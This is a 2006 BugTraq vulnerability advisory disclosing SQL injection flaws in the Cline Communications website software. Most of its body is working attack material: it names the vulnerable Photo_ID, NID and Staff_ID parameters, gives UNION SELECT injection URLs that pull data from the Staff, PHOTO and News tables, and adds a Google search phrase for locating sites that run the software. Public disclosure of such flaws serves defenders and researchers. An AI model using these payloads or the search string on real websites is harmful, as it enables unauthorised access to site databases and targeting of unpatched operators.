BugTraq
Cline Communications Sql injection Jun 17 2006 01:16PM
liz0 bsdmail com
Cline Communications Sql injection

-------------------------------------

Site:http://www.celerondude.com/

Demo:http://www.liveelite.com/

---------------------------------

Sql injection

1,photo_enlarged.php file Photo_ID parameter

2,newsdetail.php file NID parameter

3,staff_photo_enlarged.php file Staff_ID parameter

http://website/photo_enlarged.php?Photo_ID='sql

http://website/newsdetail.php?NID='sql

http://website/staff_photo_enlarged.php?Staff_ID='sql

Example:

http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3
,4,5,6+from+Staff

http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6
,7,8,9,1+from+PHOTO

http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News

http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,
news_date,5+from+News

-----------------------------------------

Credit:Liz0ziM

E-mail:liz0 (at) bsdmail (dot) com [email concealed]

Site:www.biyo.tk www.biyosecurity.be

Greeatz:My All Friend

-----------------------------------------

Google:

"This site powered by Cline Communications"

-----------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/714903/

http://liz0zim.no-ip.org/cline.txt

http://biyosecurity.be/bugs/cline.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus